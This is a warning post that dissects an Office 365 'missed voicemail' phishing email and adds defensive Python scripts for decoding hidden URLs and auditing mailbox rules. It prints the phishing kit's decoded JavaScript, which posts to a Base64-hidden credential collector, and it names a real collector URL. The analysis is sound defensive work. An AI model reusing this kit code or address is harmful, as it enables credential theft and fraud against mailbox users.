You've got 3 MISSED-CALL messages from WIRELESS-CALLER : Monday, April 19, 2021 - SPAM WARNING!!

This message has been seen going out to Office 365 and other clients.

Beware!!! - This email is a phishing trick to get your password for Office 365 and may also contain malware to damage or compromise your computer:

Hello Recipient,

Your caller left you 3 voicemail messages.

Voice - Message for: [email protected] (MISSED CALLS)

CALLER NUMBER : +44 335970973

Please download attachment to listen to Message

Messages will auto delete in 2 hours

As you can see, it appears to just record the email address:

The site to which your credentials will be sent appears to be http://mtu.edu.ng/wp-content/uploads/2020/9/9/h.php, stored Base64-encoded in the JavaScript code on the site:
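One way to pull such Base64 strings out of a captured phishing page without running its JavaScript, as an added example that is not part of the original post: it scans the source for Base64-looking runs, decodes the ones that yield printable text, and reports any that are URLs. The sample page fragment, the example.invalid domain and the variable values are constructed; they mirror the kit's use of atob on e and hp shown below.

```python
import base64
import binascii
import re

# A run of Base64 alphabet characters (16 or more, optional "=" padding) that is
# not part of a longer run of the same characters.
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/])([A-Za-z0-9+/]{16,}={0,2})(?![A-Za-z0-9+/=])")


def decode_base64_literals(source):
    """Return (token, decoded_text) for every token in `source` that decodes to
    printable UTF-8 text. Anything that is not valid Base64, or that decodes to
    binary (such as a sha256 integrity hash), is skipped."""
    findings = []
    for match in B64_TOKEN.finditer(source):
        token = match.group(1)
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError, ValueError):
            continue
        if text.isprintable():
            findings.append((token, text))
    return findings


def find_exfil_urls(source):
    """Decoded tokens that look like URLs: the usual place a kit hides the
    address its harvested credentials are posted to."""
    return [text for _, text in decode_base64_literals(source)
            if re.match(r"https?://", text)]


# Constructed sample modelled on the kit quoted in the post: the email address
# (e) and the collector URL (hp) are Base64-encoded, the page URL (eur) is in
# clear. example.invalid is a placeholder, not the site named in the post.
SAMPLE_JS = (
    'var e = "' + base64.b64encode(b"victim@example.invalid").decode() + '";\n'
    'var hp = "' + base64.b64encode(b"http://example.invalid/uploads/h.php").decode() + '";\n'
    'var eur = "https://login.example.invalid/login.srf";\n'
    'var ep = "";\n'
    '<script integrity="sha256-c3RzsUWg+y2XljunEQS0LqWdQ04X1D3j22fd/8JCAKw="></script>\n'
)

if __name__ == "__main__":
    for token, text in decode_base64_literals(SAMPLE_JS):
        print(f"{token} -> {text}")
    print("exfil URLs:", find_exfil_urls(SAMPLE_JS))
```

The integrity hash in the sample is deliberately left in: it is valid Base64 but decodes to binary, so the UTF-8 check drops it, which is the kind of false positive a naive "decode everything" script would report.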

Their code site appears to be (or have been) protected by Cloudflare, who really do need to check on their customers a little more closely.

Decoded from Base64, their HTML code reads:

<html>
<head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script
  src="https://cdnjs.cloudflare.com/ajax/libs/html2canvas/0.4.1/html2canvas.min.js"
  integrity="sha256-c3RzsUWg+y2XljunEQS0LqWdQ04X1D3j22fd/8JCAKw="
  crossorigin="anonymous"
></script>
<script
  src="https://cdnjs.cloudflare.com/ajax/libs/FileSaver.js/1.3.8/FileSaver.min.js"
  integrity="sha256-FPJJt8nA+xL4RU6/gsriA8p8xAeLGatoyTjldvQKGdE="
  crossorigin="anonymous"
></script>
</head>
<body>
<div id="capture" style="padding: 10px; color: black"></div>
<script type="text/javascript">
  // e, ep, eur and hp are not defined in this fragment; they are set elsewhere
  // on the page. e carries the victim's email address (Base64-encoded where
  // atob succeeds), hp the Base64-encoded address of the collector script.
  try {
    var email = atob(e);
  } catch (e) {
    var email = e;
  }
  var domain = e.split("@");

  // After two seconds, ask the back end to fetch a page keyed to the victim's
  // address and domain.
  setTimeout(() => {
    loadPages(
      eur +
        "?e=" +
        e +
        "&ep=" +
        ep +
        "&en=" +
        btoa(e) +
        "&eu=" +
        domain[1]
    );
  }, 2000);

  function loadPages(load) {
    var testURL = load;

    // POST the URL to the Base64-encoded collector script, then rewrite the
    // relative links in the HTML it returns so the copy renders correctly
    // inside the "capture" div.
    $.ajax({
      url: atob(hp),
      method: "POST",
      data: { url: testURL },
      success: function (response) {
        response = response.replace(/href="\//g, 'href="' + testURL + "/");
        response = response.replace(/src="\//g, 'src="' + testURL + "/");
        response = response.replace(
          /content="\//g,
          'content="' + testURL + "/"
        );

        $("#capture").html(response);
        // console.log(response);
      },
    });
  }
</script>
</body>
</html>

This code is designed to impersonate the Office 365 login and send your password to the hackers so that they can use your credentials to compromise you in some way. Often they are looking for email accounts that deal with invoicing etc., which they can take control of and then insert fake bank account details to try to defraud companies or individuals.

If you have ever put your email credentials into a page that suddenly redirects you somewhere unexpected, or to your home Office 365 page when you were being asked for access codes, change your password immediately and check your mail account for mailbox rules that you did not create. Typically they pick one person to try to defraud and then create rules in your mailbox so that you do not see any replies from that person that might give the game away.
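What "rules you did not create" tend to look like in practice, as an added example that is not from the original post: a small Python triage over a mailbox's inbox rules that flags the patterns the paragraph describes (mail from one chosen correspondent quietly hidden, mail forwarded to an outside address, rules with blank or punctuation-only names, finance keywords). The field names follow what Exchange Online's Get-InboxRule cmdlet returns, which is the export you would feed it; the sample rules, mailbox and addresses are constructed.

```python
import re

FINANCE_WORDS = {"invoice", "payment", "remittance", "wire", "bank", "account"}
# Folders a user rarely opens, so mail moved there is effectively hidden.
HIDING_FOLDERS = {"rss feeds", "rss subscriptions", "archive", "junk email",
                  "deleted items", "conversation history", "notes"}

# Constructed sample. Field names mirror Get-InboxRule output (Name, From,
# SubjectContainsWords, MoveToFolder, DeleteMessage, MarkAsRead, ForwardTo,
# RedirectTo, ForwardAsAttachmentTo); values are made up and recipients are
# plain SMTP addresses for simplicity.
MAILBOX = "accounts@example.invalid"
SAMPLE_RULES = [
    {"Name": "Newsletters", "Enabled": True,
     "From": ["news@vendor.invalid"], "SubjectContainsWords": [],
     "MoveToFolder": "Newsletters", "DeleteMessage": False, "MarkAsRead": False,
     "ForwardTo": [], "RedirectTo": [], "ForwardAsAttachmentTo": []},
    # The pattern the post describes: one chosen correspondent, replies hidden.
    {"Name": ".", "Enabled": True,
     "From": ["cfo@customer.invalid"], "SubjectContainsWords": [],
     "MoveToFolder": "RSS Subscriptions", "DeleteMessage": False, "MarkAsRead": True,
     "ForwardTo": [], "RedirectTo": [], "ForwardAsAttachmentTo": []},
    {"Name": "Backup", "Enabled": True,
     "From": [], "SubjectContainsWords": ["invoice", "payment"],
     "MoveToFolder": None, "DeleteMessage": False, "MarkAsRead": False,
     "ForwardTo": ["drop@freemail.invalid"], "RedirectTo": [], "ForwardAsAttachmentTo": []},
]


def _domain(address):
    """Domain part of an SMTP address, tolerating a trailing ']' or '>'."""
    return address.rsplit("@", 1)[-1].strip(">] ").lower()


def triage_inbox_rules(rules, mailbox):
    """Return {rule name: [reasons]} for every rule that shows a sign of
    post-compromise tampering. Rules with nothing to report are omitted."""
    own_domain = _domain(mailbox)
    report = {}
    for rule in rules:
        reasons = []
        folder = (rule.get("MoveToFolder") or "").lower()
        hides = bool(rule.get("DeleteMessage")) or folder in HIDING_FOLDERS
        if hides:
            reasons.append("deletes or hides incoming mail")
        targets = (rule.get("ForwardTo", []) + rule.get("RedirectTo", [])
                   + rule.get("ForwardAsAttachmentTo", []))
        if any(_domain(t) != own_domain for t in targets):
            reasons.append("forwards or redirects to an external address")
        if hides and len(rule.get("From", [])) == 1:
            reasons.append("restricts to a single sender and hides their mail")
        if not re.sub(r"[\W_]", "", rule.get("Name", "")):
            reasons.append("name is blank or punctuation only")
        words = {w.lower() for w in rule.get("SubjectContainsWords", [])
                 + rule.get("BodyContainsWords", [])}
        if words & FINANCE_WORDS:
            reasons.append("matches finance keywords")
        if reasons:
            report[rule["Name"]] = reasons
    return report


if __name__ == "__main__":
    for name, reasons in triage_inbox_rules(SAMPLE_RULES, MAILBOX).items():
        print(f"rule {name!r}: " + "; ".join(reasons))
```

Run it against a real export and anything it lists is worth reading in full; the Newsletters rule in the sample is there to show that an ordinary move-to-folder rule with a single sender does not trip it.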

If you suspect you have had your mailbox compromised, contact all your friends or suppliers and warn them to be vigilant.
